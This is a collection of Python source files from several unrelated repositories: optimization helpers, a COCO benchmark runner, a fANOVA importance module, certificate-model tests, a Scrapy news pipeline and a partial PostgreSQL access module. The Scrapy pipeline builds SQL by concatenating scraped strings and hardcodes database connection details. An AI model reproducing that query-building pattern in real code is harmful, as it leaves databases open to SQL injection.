# x0=xtry,
# bounds=bounds,
# approx_grad=True,
# maxiter=100)
# if (loc is None) or (res[1] < value):
# loc = res[0]
# value = res[1]
# return loc, value
# def AcquisitionSLSQPOptimizer(gpr, acq, it, bounds, n_trial=2):
# bounds = np.atleast_2d(bounds)
# vmax = np.max(gpr.Y_train)
# vmin = np.min(gpr.Y_train)
# ndim = len(bounds)
# loc = None
# value = None
#
# import scipy.optimize
# def Obj(x):
# mu,sigma = gpr.posterior_predictive(np.atleast_2d(x),return_std=True)
# return -1.*acq(mu,sigma, it=it, vmax=vmax, vmin=vmin).ravel()
#
# x_seeds = onp.random.uniform(bounds[:,0],bounds[:,1], size=(n_trial,ndim))
# for xtry in x_seeds:
# res = scipy.optimize.fmin_slsqp(Obj,
# x0=xtry,
# bounds=bounds,
# iprint=0,
# full_output=True,
# iter=100)
# if (loc is None) or (res[1] < value):
# loc = res[0]
# value = res[1]
# return loc, value
# def AcquisitionGridOptimizer(gpr, acq, it, bounds, step):
# bounds = np.atleast_2d(bounds)
# vmax = np.max(gpr.Y_train)
# vmin = np.min(gpr.Y_train)
#
# GS = GridSampler(bounds,step)
# mu_s, std_s = gpr.posterior_predictive(GS.grid,return_std=True)
# val = acq(mu_s, std_s, it=it, vmax=vmax, vmin=vmin).ravel()
# return GS.grid[np.argmax(val)],np.max(val)
# class GridSampler(object):
# def __init__(self, bounds, step):
# self.__Xmin = np.atleast_2d(bounds)[:,0]
# self.__Xmax = np.atleast_2d(bounds)[:,1]
# ##data dimention check
# if self.__Xmin.shape != self.__Xmax.shape :
# raise ValueError('Xmin,Xmax should be same size.')
# self.__ndim = len(self.__Xmin)
#
# ##step size init
# self.__step = transform_data(step)
# if (self.__step.shape != (self.__ndim,1)):
# if self.__step.shape[1] != 1:
# raise ValueError('step should be an 1-D array_like or a numerical value.')
# if self.__step.shape[0] == 1:
# self.__step = np.full_like(self.__Xmin,step)
# else:
# raise ValueError(f'step shape should be same shape of Xmin and Xmax: {self.__Xmin.shape}, but get{self.__step.shape}')
#
# ##generate grid points
# d_list = tuple(np.arange(mi,ma,st) for mi,ma,st in zip(self.__Xmin,self.__Xmax,self.__step))
# self.grid = np.array(np.meshgrid(*d_list)).reshape(self.__ndim,-1).T
#
# ###iterator###
# self.__i = 0
#
# def __iter__(self):
# return self
#
# def __next__(self):
# if self.__i == len(self.grid):
# raise StopIteration()
# ret = tuple(self.grid[self.__i])
# self.__i += 1
# return ret
#
# def __call__(self):
# return self.grid
``` |
{
"source": "JohnYKiyo/coco_trial",
"score": 2
} |
#### File: coco_trial/solver/experiment.py
```python
from cocoex import default_observers
from cocoex import Observer
from cocoex import Suite
from cocoex.utilities import ObserverOptions
from tqdm import tqdm
from typing import Callable # NOQA
from typing import Optional # NOQA
from scipy.optimize import fmin
class Experiment(object):
def __init__(self,
solver,
suite_name="bbob",
suite_instance="",
suite_options="dimensions: 2,3",
algorithm_name=None):
self._solver = solver
self._suite_name = suite_name
self._suite_instance = suite_instance
self._suite_options = suite_options
self._algorithm_name = algorithm_name
def _build_observer_options(self, budget):
# type: (int) -> ObserverOptions
'''
self._algorithm_name = 'hoge'
self._suite_name = 'bbob'
budget = 100
return {'result_folder': '"hoge/on_bbob_budget0100xDim"', 'algorithm_name': 'hoge'}
'''
opts = {
'result_folder':
'"%s/on_%s_budget%04dxDim"' %
(self._algorithm_name, self._suite_name, budget),
'algorithm_name': self._algorithm_name
}
return ObserverOptions(opts)
def run(self,budget=1e1, # use 1e1 or even 2 for a quick first test run
current_batch=1,
number_of_batches=15):
        suite = Suite(self._suite_name, self._suite_instance, self._suite_options)  # behaves like a list of bbob benchmark problems
observer_name = default_observers()[self._suite_name]
observer_options = self._build_observer_options(budget)
observer = Observer(observer_name, observer_options.as_string)
#observer = Observer("bbob", "result_folder: myoptimizer-on-bbob")
for p_index, p in enumerate(tqdm(suite)):# loop over all problems
if (p_index % number_of_batches) != current_batch - 1:
continue
observer.observe(p)# prepare logging of necessary data
max_evals = budget * p.dimension
self._solver(p,
p.initial_solution,
p.lower_bounds,
p.upper_bounds,
p.dimension,
p.evaluations_constraints,
max_evals)
#for p in suite: # loop over all problems
# observer.observe(p) # prepare logging of necessary data
# fmin(p, p.initial_solution) # disp=False would silence fmin output
# while (not p.final_target_hit and # apply restarts, if so desired
# p.evaluations < p.dimension * budget_multiplier):
# fmin(p, p.lower_bounds + (rand(p.dimension) + rand(p.dimension)) *
# (p.upper_bounds - p.lower_bounds) / 2)
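# Usage sketch (illustrative; assumes a solver with the signature expected by
# Experiment.run, e.g. the `solve` function from solver/scipy_fmin.py in this repo):
#
#     from solver.scipy_fmin import solve
#
#     exp = Experiment(solve, suite_name="bbob",
#                      suite_options="dimensions: 2,3",
#                      algorithm_name="scipy-fmin")
#     exp.run(budget=10, current_batch=1, number_of_batches=15)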
```
#### File: coco_trial/solver/scipy_fmin.py
```python
import numpy as np
from numpy.random import rand
from scipy.optimize import fmin
#y_best = float('inf')
x_best = np.zeros(0)
x_list = []
#y_list = []
def solve(objective,
x0,
lower_bounds,
upper_bounds,
dim,
eval_constraints,
max_evals):
global x_best,x_list
#y_best = float('inf')
x_best = np.zeros(0)
x_best = fmin(objective, x0)
while (not objective.final_target_hit and # apply restarts, if so desired
objective.evaluations < dim * max_evals):
x_best = fmin(objective,
lower_bounds + (rand(dim) + rand(dim))*(upper_bounds - lower_bounds) / 2)
``` |
{
"source": "JohnYKiyo/density_ratio_estimation",
"score": 2
} |
#### File: JohnYKiyo/density_ratio_estimation/setup.py
```python
from setuptools import setup
# from setuptools import find_packages
def _requires_from_file(filename):
return open(filename).read().splitlines()
with open("README.md", "r") as f:
long_description = f.read()
setup(
name="densityratio",
version="1.0.1",
license="MIT License + LICENSE file",
description="A Python Package for Direct density estimation by unconstrained Least-Squares Importance Fitting (uLSIF).",
long_description=long_description,
long_description_content_type='text/markdown',
author="<NAME>",
author_email='<EMAIL>',
url="https://github.com/JohnYKiyo/density_ratio_estimation",
keywords='density ratio estimation',
python_requires=">=3.6.0",
packages=['densityratio', 'densityratio.densityratio'],
package_dir={'densityratio': 'src'},
install_requires=[
'jax>=0.1.57',
'jaxlib>=0.1.37'
]
)
``` |
{
"source": "JohnYKiyo/fANOVA",
"score": 3
} |
#### File: fANOVA/functionalANOVA/fanova.py
```python
from typing import (
Tuple,
List,
Union,
Dict,
Optional,
)
import numpy as np
import pandas as pd
import itertools
from sklearn.ensemble import RandomForestRegressor
from .forest_tree import ForestTree
from copy import deepcopy
class FunctionalANOVA(object):
"""__init__
Args:
X (pd.DataFrame): DataFrame with the features.
        y (pd.DataFrame): DataFrame with the response values. The DataFrame should be one-dimensional.
search_spaces (Optional[np.ndarray], optional): The ranges of features. Ex:[[MIN, MAX], ..., [MIN, MAX]] ndarray. Defaults to None.
degree (int, optional): Combination order of features. Defaults to 1.
n_tree (int, optional): Number of trees in the forest to be fit. Defaults to 32.
max_depth (int, optional): Maximal depth of each tree in the forest. Defaults to 64.
min_samples_leaf (int, optional): Minimum number of samples required in a leaf. Defaults to 1.
min_samples_split (int, optional): Minimum number of samples required to attempt to split . Defaults to 2.
seed (int, optional): Seed for the forests randomness. Defaults to 0.
"""
def __init__(
self,
X: pd.DataFrame,
y: pd.DataFrame,
search_spaces: Optional[np.ndarray] = None,
degree: int = 1,
n_tree: int = 32,
max_depth: int = 64,
min_samples_leaf: int = 1,
min_samples_split: int = 2,
seed: int = 0,
) -> None:
self._X = deepcopy(X)
self._y = deepcopy(y)
self.n_features = X.shape[1]
self._search_spaces = self._get_search_spaces(search_spaces)
self._columns = list(self._X.columns.values.astype(str))
self._f = _Fanova(
n_trees=n_tree,
max_depth=max_depth,
min_samples_leaf=min_samples_leaf,
min_samples_split=min_samples_split,
seed=seed)
assert self.n_features >= degree, f'degree must be less than or equal to feature dimension. but degree:{degree}, n_features:{self.n_features}'
self._combination_of_features = self._listup_combination_of_features(degree=degree, n_features=self.n_features)
self._compute_importance()
def _get_search_spaces(
self,
search_spaces: Optional[np.ndarray]
) -> np.ndarray:
spaces = deepcopy(search_spaces)
if spaces is None:
spaces = np.column_stack([self._X.min().values, self._X.max().values])
assert self.n_features == spaces.shape[0], 'X must have same dimension of search_spaces'
assert spaces.shape[1] == 2, 'search_spaces requires [[MIN, MAX], ..., [MIN, MAX]] ndarray'
return spaces
def _listup_combination_of_features(self, degree: int, n_features: int) -> List[Tuple]:
features_indexes = list(range(n_features))
combinations = []
for i in range(1, 1 + degree):
combinations += list(itertools.combinations(features_indexes, i))
return combinations
def _compute_importance(self) -> None:
self._f.fit(X=self._X.values,
y=self._y.values.ravel(),
search_spaces=self._search_spaces,
column_to_encoded_columns=self._combination_of_features)
importances_value = [self._f.get_importance((i,))[0] for i in range(len(self._combination_of_features))]
importances_error = [self._f.get_importance((i,))[1] for i in range(len(self._combination_of_features))]
name_list = []
for comb_name in self._combination_of_features:
name = ''
for i in comb_name:
name += list(self._columns)[i] + ' '
name_list.append(name[:-1])
self._importances = pd.DataFrame(
{
'importance_value': importances_value,
'importance_error': importances_error,
'marginal_feature_name': name_list
})
@property
def importances(self) -> pd.DataFrame:
return self._importances
def get_importances(self, features: Tuple[int, ...]) -> Tuple[float, float]:
"""Use to calculate the product set.
Args:
features (Tuple[int, ...]): The input is get_importances((0,1)), the contribution of the product set of the 0th index and 1st index features is calculated.
Returns:
Tuple[float, float]: return (importance_value, importance_error) tuple.
"""
return self._f.get_importance(features)
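# Usage sketch (illustrative, with synthetic data):
#
#     import numpy as np
#     import pandas as pd
#
#     rng = np.random.RandomState(0)
#     X = pd.DataFrame(rng.rand(100, 3), columns=["a", "b", "c"])
#     y = pd.DataFrame(2.0 * X["a"] + 0.1 * rng.rand(100))
#     fanova = FunctionalANOVA(X, y, degree=2)
#     print(fanova.importances)              # main-effect and pairwise importances
#     print(fanova.get_importances((0, 1)))  # interaction of the first two features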
class _Fanova(object):
def __init__(
self,
n_trees: int,
max_depth: int,
min_samples_split: Union[int, float],
min_samples_leaf: Union[int, float],
seed: Optional[int],
) -> None:
self._forest = RandomForestRegressor(
n_estimators=n_trees,
max_depth=max_depth,
min_samples_split=min_samples_split,
min_samples_leaf=min_samples_leaf,
random_state=seed,
)
self._trees: Optional[List[ForestTree]] = None
self._variances: Optional[Dict[Tuple[int, ...], np.ndarray]] = None
self._column_to_encoded_columns: Optional[List[np.ndarray]] = None
def fit(
self,
X: np.ndarray,
y: np.ndarray,
search_spaces: np.ndarray,
column_to_encoded_columns: List[Tuple],
) -> None:
assert X.shape[0] == y.shape[0]
assert X.shape[1] == search_spaces.shape[0]
assert search_spaces.shape[1] == 2
self._forest.fit(X, y)
self._trees = [ForestTree(e.tree_, search_spaces) for e in self._forest.estimators_]
self._column_to_encoded_columns = column_to_encoded_columns
self._variances = {}
if all(tree.variance == 0 for tree in self._trees):
# If all trees have 0 variance, we cannot assess any importances.
# This could occur if for instance `X.shape[0] == 1`.
raise RuntimeError("Encountered zero total variance in all trees.")
def get_importance(self, features: Tuple[int, ...]) -> Tuple[float, float]:
# Assert that `fit` has been called.
assert self._trees is not None
assert self._variances is not None
self._compute_variances(features)
fractions: Union[List[float], np.ndarray] = []
for tree_index, tree in enumerate(self._trees):
tree_variance = tree.variance
if tree_variance > 0.0:
fraction = self._variances[features][tree_index] / tree_variance
fractions = np.append(fractions, fraction)
fractions = np.asarray(fractions)
return float(fractions.mean()), float(fractions.std())
def _compute_variances(self, features: Tuple[int, ...]) -> None:
assert self._trees is not None
assert self._variances is not None
assert self._column_to_encoded_columns is not None
if features in self._variances:
return
for k in range(1, len(features)):
for sub_features in itertools.combinations(features, k):
if sub_features not in self._variances:
self._compute_variances(sub_features)
raw_features = np.concatenate([self._column_to_encoded_columns[f] for f in features])
variances = np.empty(len(self._trees), dtype=np.float64)
for tree_index, tree in enumerate(self._trees):
marginal_variance = tree.get_marginal_variance(raw_features)
# See `fANOVA.__compute_marginals` in https://github.com/automl/fanova/blob/master/fanova/fanova.py.
for k in range(1, len(features)):
for sub_features in itertools.combinations(features, k):
marginal_variance -= self._variances[sub_features][tree_index]
variances[tree_index] = np.clip(marginal_variance, 0.0, np.inf)
self._variances[features] = variances
``` |
{
"source": "johnykkwan/cert-core",
"score": 2
} |
#### File: cert_core/cert_store/config.py
```python
import os
import configargparse
BASE_DIR = os.path.abspath(os.path.join(os.path.dirname(__file__), os.pardir))
def create_config():
p = configargparse.getArgumentParser(default_config_files=[os.path.join(BASE_DIR, 'conf_test.ini'),
os.path.join(BASE_DIR, 'conf_local.ini'),
os.path.join(BASE_DIR, 'conf.ini'),
'/etc/cert-issuer/conf.ini'])
p.add('-c', '--my-config', required=False, is_config_file=True, help='config file path')
p.add_argument('--mongodb_uri', default='mongodb://localhost:27017/test', type=str, env_var='MONGODB_URI',
help='Mongo connection string, including db containing certificates')
p.add_argument('--cert_store_type', type=str, help='type of key value store to use for Cert Store')
p.add_argument('--cert_store_path', type=str, help='path to file system Cert Store')
p.add_argument('--v1_aware', action='store_true', help='Whether to support v1 certs')
args, _ = p.parse_known_args()
return args
parsed_config = None
def get_config():
global parsed_config
if parsed_config:
return parsed_config
parsed_config = create_config()
return parsed_config
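# Usage sketch (illustrative):
#
#     config = get_config()
#     print(config.mongodb_uri)   # default, conf file value, or MONGODB_URI env var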
```
#### File: cert-core/tests/test_model.py
```python
import json
import unittest
from cert_core import BlockcertVersion
from cert_core import Chain
from cert_core.cert_store import helpers
from cert_core.cert_model import model
from cert_core.cert_model.model import ProofType, parse_date
from cert_core.cert_model.model import SignatureType
class TestModel(unittest.TestCase):
def test_detect_version_v1_1(self):
with open('data/1.1/sample_signed_cert-1.1.json', 'rb') as cert_file:
certificate_bytes = cert_file.read()
certificate_json = helpers.certificate_bytes_to_json(certificate_bytes)
version = model.detect_version(certificate_json)
self.assertEqual(version, BlockcertVersion.V1_1)
def test_detect_version_v1_2(self):
with open('data/1.2/609c2989-275f-4f4c-ab02-b245cfb09017.json', 'rb') as cert_file:
certificate_bytes = cert_file.read()
certificate_json = helpers.certificate_bytes_to_json(certificate_bytes)
version = model.detect_version(certificate_json)
self.assertEqual(version, BlockcertVersion.V1_2)
def test_to_certificate_model_v1_1(self):
with open('data/1.1/sample_signed_cert-1.1.json', 'rb') as cert_file:
certificate_bytes = cert_file.read()
certificate_json = helpers.certificate_bytes_to_json(certificate_bytes)
txid = '1703d2f5d706d495c1c65b40a086991ab755cc0a02bef51cd4aff9ed7a8586aa'
certificate_model = model.to_certificate_model(certificate_json, txid, certificate_bytes)
self.assertEqual(certificate_model.issuer.id,
'http://www.blockcerts.org/mockissuer/issuer/got-issuer.json')
self.assertEqual(certificate_model.txid,
'1703d2f5d706d495c1c65b40a086991ab755cc0a02bef51cd4aff9ed7a8586aa')
self.assertEqual(certificate_model.title, 'Game of Thrones Character')
self.assertEqual(certificate_model.description,
'This certifies that the named character is an official Game of Thrones character.')
self.assertEqual(certificate_model.uid, '75857d18-0e1c-4933-b4c8-33484396e06b')
self.assertEqual(certificate_model.subtitle, None)
self.assertEqual(certificate_model.expires, None)
self.assertEqual(certificate_model.issuer.name, 'Game of thrones characters')
self.assertEqual(certificate_model.recipient_public_key, '<KEY>')
self.assertEqual(certificate_model.issued_on, parse_date('2016-08-29 00:00:00+00:00'))
# self.assertEqual(certificate_model.blockcert_signature, None)
self.assertIsNotNone(certificate_model.signature_image[0].image)
self.assertEqual(certificate_model.signatures[0].signature_type, SignatureType.signed_content)
self.assertEqual(certificate_model.signatures[1].signature_type, SignatureType.signed_transaction)
self.assertIsNone(certificate_model.signatures[1].merkle_proof)
self.assertEqual(certificate_model.chain, Chain.bitcoin_testnet)
def test_to_certificate_model_v1_2(self):
"""
Note this is a bitcoin_mainnet certificate with different uid
:return:
"""
with open('data/1.2/609c2989-275f-4f4c-ab02-b245cfb09017.json', 'rb') as cert_file:
certificate_bytes = cert_file.read()
certificate_json = helpers.certificate_bytes_to_json(certificate_bytes)
certificate_model = model.to_certificate_model(certificate_json)
self.assertEqual(certificate_model.version, BlockcertVersion.V1_2)
self.assertEqual(certificate_model.issuer.id,
'http://www.blockcerts.org/mockissuer/issuer/got-issuer_live.json')
self.assertEqual(certificate_model.txid,
'8623beadbc7877a9e20fb7f83eda6c1a1fc350171f0714ff6c6c4054018eb54d')
self.assertEqual(certificate_model.title, 'Game of Thrones Character')
self.assertEqual(certificate_model.description,
'This certifies that the named character is an official Game of Thrones character.')
self.assertEqual(certificate_model.uid, '609c2989-275f-4f4c-ab02-b245cfb09017')
self.assertEqual(certificate_model.subtitle, None)
self.assertEqual(certificate_model.expires, None)
self.assertEqual(certificate_model.issuer.name, 'Game of thrones issuer')
self.assertEqual(certificate_model.recipient_public_key, '<KEY>')
self.assertEqual(certificate_model.issued_on, parse_date('2016-10-03 00:00:00+00:00'))
self.assertIsNotNone(certificate_model.signature_image[0].image)
self.assertEqual(certificate_model.chain, Chain.bitcoin_mainnet)
def test_to_proof(self):
with open('data/1.2/receipt.json') as receipt_file:
receipt_json = json.load(receipt_file)
proof = model.parse_merkle_proof(receipt_json['receipt'])
self.assertEqual(proof.target_hash, '2d3d0f49416587c4ce14c05d47c4193f0da3dd56f7244a568b06484cb8d2fe78')
self.assertEqual(proof.merkle_root, '3268386feb897f6cab2c100a0edb6f66b4bb3a8745e3e3e8a54b1cb7151a6d96')
self.assertEqual(proof.proof_type, ProofType.merkle_proof_2017)
def test_to_v2_proof(self):
with open('data/2.0/receipt.json') as receipt_file:
receipt_json = json.load(receipt_file)
proof = model.parse_merkle_proof(receipt_json)
self.assertEqual(proof.target_hash,
'c9ead76a54426b4ce4899bb921e48f5b55ea7592e5cee4460c86ebf4698ac3a6')
self.assertEqual(proof.merkle_root,
'68f3ede17fdb67ffd4a5164b5687a71f9fbb68da803b803935720f2aa38f7728')
self.assertEqual(proof.proof_type, ProofType.merkle_proof_2017)
def test_to_certificate_model_v2_alpha(self):
with open('data/2.0-alpha/8e0b8a28-beff-43de-a72c-820bc360db3d.json', 'rb') as cert_file:
certificate_bytes = cert_file.read()
certificate_json = helpers.certificate_bytes_to_json(certificate_bytes)
certificate_model = model.to_certificate_model(certificate_json)
self.assertEqual(certificate_model.version, BlockcertVersion.V2_ALPHA)
self.assertEqual(certificate_model.issuer.id,
'https://www.blockcerts.org/blockcerts_v2_alpha/samples/issuer_testnet.json')
self.assertEqual(certificate_model.txid,
'08e205566662b97f149ad677649bbb94ebc2f46c0ac72bc7c9b57d2d207015f4')
self.assertEqual(certificate_model.title, 'This is the certificate title')
self.assertEqual(certificate_model.description, 'This is the display description of the certificate.')
self.assertEqual(certificate_model.uid, 'urn:uuid:8e0b8a28-beff-43de-a72c-820bc360db3d')
self.assertEqual(certificate_model.subtitle, None)
self.assertEqual(certificate_model.expires, None)
self.assertEqual(certificate_model.issuer.name, 'Issuer Institution Name')
self.assertEqual(certificate_model.recipient_public_key, '<KEY>')
self.assertEqual(certificate_model.issued_on, parse_date('2017-05-01 00:00:00+00:00'))
self.assertEqual(certificate_model.chain, Chain.bitcoin_testnet)
def test_to_certificate_model_v2(self):
with open('data/2.0/bbba8553-8ec1-445f-82c9-a57251dd731c.json', 'rb') as cert_file:
certificate_bytes = cert_file.read()
certificate_json = helpers.certificate_bytes_to_json(certificate_bytes)
certificate_model = model.to_certificate_model(certificate_json)
self.assertEqual(certificate_model.version, BlockcertVersion.V2)
self.assertEqual(certificate_model.issuer.id,
'https://www.blockcerts.org/samples/2.0/issuer-testnet.json')
self.assertEqual(certificate_model.txid,
'd75b7a5bdb3d5244b753e6b84e987267cfa4ffa7a532a2ed49ad3848be1d82f8')
self.assertEqual(certificate_model.title, 'Certificate of Accomplishment')
self.assertEqual(certificate_model.description, 'Lorem ipsum dolor sit amet, mei docendi concludaturque ad, cu nec partem graece. Est aperiam consetetur cu, expetenda moderatius neglegentur ei nam, suas dolor laudem eam an.')
self.assertEqual(certificate_model.uid, 'urn:uuid:bbba8553-8ec1-445f-82c9-a57251dd731c')
self.assertEqual(certificate_model.subtitle, None)
self.assertEqual(certificate_model.expires, None)
self.assertEqual(certificate_model.issuer.name, 'University of Learning')
self.assertEqual(certificate_model.recipient_public_key, '<KEY>')
self.assertEqual(certificate_model.issued_on, parse_date('2017-06-29T14:58:57.461422+00:00'))
self.assertEqual(certificate_model.chain, Chain.bitcoin_testnet)
if __name__ == '__main__':
unittest.main()
``` |
{
"source": "JohnyLi/Education_System",
"score": 3
} |
#### File: src/Config/Config.py
```python
import configparser
# This class provides operations on and queries against config.ini
# --------------------------------------------- Global configuration --------------------------------------------- #
config_path="Config/config.ini"
# --------------------------------------------- Global configuration --------------------------------------------- #
class Aconfig:
def __init__(self):
self.__config = configparser.ConfigParser()
self.__config.read(config_path)
def getvalue(self,section,key):
value=self.__config.get(section,key)
return value
def getsection(self,section):
section = self.__config.items(section)
return section
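# Usage sketch (illustrative; assumes Config/config.ini contains a [table] section):
#
#     config = Aconfig()
#     info_table = config.getvalue("table", "InformationTable")
#     table_entries = config.getsection("table")   # list of (key, value) pairs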
```
#### File: src/SQL_libarary/SQL_Infor.py
```python
from Config.Link_db import *
from Config.Config import *
from SQL_libarary.SQL_Account import *
from SQL_libarary.SQL_Course import *
import time
# This class is a library of SQL methods for operating on the Information table.
# The Information table stores userid, telephone, sex and born.
# --------------------------------------------- Global configuration --------------------------------------------- #
table_section="table"
# table name config
myconfig=Aconfig()  # load the config settings
InforTable=myconfig.getvalue(table_section,"InformationTable")  # Information table name
AccountTable=myconfig.getvalue(table_section,"AccountTable")  # Account table name
CourseTable=myconfig.getvalue(table_section,"CourseTable")  # Course table name
LogTable=myconfig.getvalue(table_section,"LogTable")  # Log table name
# --------------------------------------------- Global configuration --------------------------------------------- #
class SQL_Infor:
    # Initialize: store the database connection in the class
def __init__(self, db):
        self.__db = db  # the object holding the connection to the database
    # Add a log entry to the log table
def insertlog(self, username, operation):
Time = time.strftime("%Y-%m-%d %H:%M:%S", time.localtime())
sql = "insert into %s (userid,operation,Time) " \
"select userid , '%s' , '%s' from %s where username='%s' " % (
LogTable, operation, Time, AccountTable, username)
status = self.__db.update(sql)
return status
    # Get all information
def GetAllInfor(self):
sql = " select * from %s" % (InforTable)
data = self.__db.select(sql)
return data
    # Get the corresponding information by username
def GetInfor(self, username):
sql = " select username,telephone,sex,born from %s i join %s a on a.userid=i.userid " \
"where a.username='%s'" % (InforTable,AccountTable, username)
data = self.__db.select(sql)
if (data != False):
return data
else:
return None
    # Get the user's id by username
def GetUserid(self,username):
sql = "select userid from %s where username='%s' " %(AccountTable,username)
data = self.__db.select(sql)
return data[0][0]
    # Update user information
def UpdateInfor(self,username,telephone,sex,born):
userid=self.GetUserid(username)
sql= "update %s set telephone='%s',sex='%s',born='%s' where userid='%s'" \
% (InforTable,telephone,sex,born ,userid)
status = self.__db.update(sql)
        self.insertlog(username, "update user information")
return status
    # Get all users with the given privilege
def GetUserBYprivilege(self,privilege):
sql = "select i.userid,username,born,sex,telephone,privilege from %s i join %s a on a.userid=i.userid where privilege=%s"\
%(InforTable,AccountTable,privilege)
data = self.__db.select(sql)
result=[]
for i in data:
mydict={'userid':i[0],'username':i[1],'born':i[2],'sex':i[3],'telephone':i[4],'privilege':i[5]}
result.append(mydict)
return result
    # Delete all information for the given teacher
def DeleteAll_teacher(self,username):
Account=SQL_Account(self.__db)
Course = SQL_Course(self.__db)
userid=Account.getIDbyName(username)
sql="Delete from %s where userid=%s" %(InforTable,userid)
status = self.__db.update(sql)
Courselist=Course.SearchCourse_2(username)
for i in Courselist:
courseid=Course.getCourseID(i['name'])
testlist=Course.getCourseTest(courseid)
for testid in testlist:
sql = "Delete from %s where testid=%s" % (Test_Course_Table, testid)
status = self.__db.update(sql)
sql = "Delete from %s where testid=%s" % (Student_Test_Table, testid)
status = self.__db.update(sql)
sql="Delete from %s where userid=%s" %(CourseTable,userid)
status = self.__db.update(sql)
Account.DeleteAccount(username)
return True
    # Delete all information for the given student
def DeleteAll_student(self,username):
Account = SQL_Account(self.__db)
userid = Account.getIDbyName(username)
sql = "Delete from %s where studentid=%s" %(Student_Test_Table,userid)
status = self.__db.update(sql)
sql = "Delete from %s where studentid=%s" % (Student_Course_Table, userid)
status = self.__db.update(sql)
Account.DeleteAccount(username)
return True
    # Insert user information
def InsertInfor(self,username,password,telephone,sex,born,privilege):
Account = SQL_Account(self.__db)
Account.InsertAccount(username,password,privilege)
userid=Account.getIDbyName(username)
sql = "Insert into %s values(%s,'%s','%s','%s')"%(InforTable,userid,telephone,sex,born)
status = self.__db.update(sql)
return True
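# Usage sketch (illustrative; assumes a database wrapper object `db` exposing the
# select()/update() methods used above):
#
#     infor = SQL_Infor(db)
#     students = infor.GetUserBYprivilege(2)   # the privilege value is hypothetical
#     infor.UpdateInfor("alice", "555-0100", "F", "1990-01-01")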
``` |
{
"source": "JohnyLn/ROS_Courses",
"score": 3
} |
#### File: src/pkg1/timepub.py
```python
import rospy
import time
from std_msgs.msg import String, Float64, Int32
def timer():
rospy.init_node("timer")
timer_pub = rospy.Publisher("/time",String, queue_size=10)
rate = rospy.Rate(10)
while not rospy.is_shutdown():
heure = str(rospy.get_rostime().secs)
timer_pub.publish(heure)
rate.sleep()
if __name__ == '__main__':
try:
timer()
except rospy.ROSInterruptException:
print("End")
``` |
{
"source": "johnyluyte/scrapy-demo-appledaily",
"score": 3
} |
#### File: tutorial/tutorial/pipelines.py
```python
import re
import MySQLdb
# 1. First, register the pipeline function you want to use in ITEM_PIPELINES = {} in settings.py
class AppleDailyPipeline(object):
def process_item(self, item, spider):
if(len(item['title'])!=0):
            # Convert the data to UTF-8
            # This is only so the demo print output looks nicer; in practice you would convert when storing the data.
# http://blog.chunnorris.cc/2015/04/unicode.html
title = item['title'][0].encode('UTF-8')
url = item['url'][0].encode('UTF-8')
category = item['category'][0].encode('UTF-8')
time = item['time'][0].encode('UTF-8')
            # 2. Process the data
            # Apple Daily appends the click count to the headline in parentheses,
            # for example a headline such as "... (920)"
            # has a click count of 920.
            # We use the built-in re library to handle the regex.
            regex_pattern = r"\((\d+)\)"
            # This uses regex syntax; look it up if you are curious.
            clicks = re.findall(regex_pattern, title)
            # re.findall returns a list of strings; here we only need the first element.
            clicks = clicks[0]
            # Then process the title as well.
            title = re.findall(r"(.+)\(", title)[0]
            # Process the url.
url = "http://www.appledaily.com.tw/realtimenews/section/new" + url
print "\033[1;33m [AppleDailyPipeline]"
print title
print url
print category
print time
print clicks
print "\033[m"
self.upload_to_database(title, url, category, time, clicks)
return item
    # 3. Upload to the database using the MySQLdb library
    # If you do not have MySQLdb, install it first:
    # http://www.tutorialspoint.com/python/python_database_access.htm
    # $ pip install MySQL-python
    # Remember to use virtualenv, if you are not already. XD
def upload_to_database(self, title, url, category, time, clicks):
conn = MySQLdb.connect(
            # Note: change these to your own database settings; my database blocks outside IPs, so you will not be able to connect with these.
host = "172.16.31.10",
db = "chunnorr_apple",
user = "chunnorr_apple",
passwd = "<PASSWORD>",
charset = "utf8",
use_unicode = True,
)
cursor = conn.cursor()
cursor.execute(
            # Insert the Apple Daily data we just scraped and processed
"INSERT INTO `table_news` VALUES('" + title + "','" + url + "','" + category + "','" + time + "','" + clicks + "');"
)
conn.close()
    # In this example the program is quite inefficient, because the DB I/O overhead is large. Ideally we would
    # process all of the data first and store it with a single DB I/O, instead of one DB I/O per item.
    # But this is only meant to demonstrate scrapy's pipeline mechanism, so we will not go further here.
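    # A rough sketch of that batched approach (illustrative only): buffer the
    # processed rows in process_item() and flush them once, e.g. in close_spider(),
    # with a single executemany() call instead of one INSERT per item:
    #
    #     def close_spider(self, spider):
    #         conn = MySQLdb.connect(...)   # same connection settings as above
    #         cursor = conn.cursor()
    #         cursor.executemany(
    #             "INSERT INTO `table_news` VALUES (%s, %s, %s, %s, %s)",
    #             self.buffered_rows)       # hypothetical list filled in process_item
    #         conn.commit()
    #         conn.close()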
``` |
{
"source": "johnymachine/csv2db",
"score": 2
} |
#### File: src/app/database.py
```python
from PyQt5.QtCore import pyqtSlot, pyqtSignal, QThread, QMutex, QMutexLocker
import psycopg2
from datetime import datetime
import atexit
import json
REMOTE = {
'host': '172.16.17.32',
'database': 'rdb2015_danielmadera',
'user': 'student',
'password': '<PASSWORD>'
}
LOCAL = {
'host': '127.0.0.1',
'database': 'rdb2015_danielmadera',
'user': 'postgres',
'password': '<PASSWORD>'
}
def connect(location=LOCAL):
"""Opens and returns a database connection."""
conn = psycopg2.connect(**location)
with conn.cursor() as cur:
cur.execute("set search_path to 'rdb'")
conn.commit()
return conn
with open("database.json", 'r') as stream:
conn = connect(json.load(stream))
def get_devices():
"""Retrieves all devices from database."""
sql = 'select "serial_number", "deviation", "description" from "devices"'
with conn.cursor() as cur:
cur.execute(sql)
return cur.fetchall()
def remove_device(serial_number):
sql = 'delete from "devices" where "serial_number" = (%s)'
with conn.cursor() as cur:
cur.execute(sql, (serial_number,))
conn.commit()
def get_blocks(filter_=None):
sql = 'select "id", "description" from "blocks" where "id" in ({0}) order by "id"'
subquery = 'select distinct "block_id" from "measurements_view"'
with conn.cursor() as cur:
cur.execute(sql.format(subquery + filter_to_sql(cur, filter_)))
return cur.fetchall()
def remove_block(id_):
sql = 'delete from "blocks" where "id" = (%s)'
with conn.cursor() as cur:
cur.execute(sql, (id_,))
conn.commit()
def get_units():
sql = 'select "unit" from "units"'
with conn.cursor() as cur:
cur.execute(sql)
return cur.fetchall()
def get_measurements(filter_=None, offset=0, limit=20):
sql_begin = 'select "created" at time zone \'utc\', "value1", "value2", "difference", \
"device_description", "device_deviation" from \
"measurements_view"'
with conn.cursor() as cur:
sql = sql_begin + filter_to_sql(cur, filter_)
sql = sql + cur.mogrify('order by "created" desc offset %s limit %s',
(offset, limit)).decode('utf-8')
cur.execute(sql)
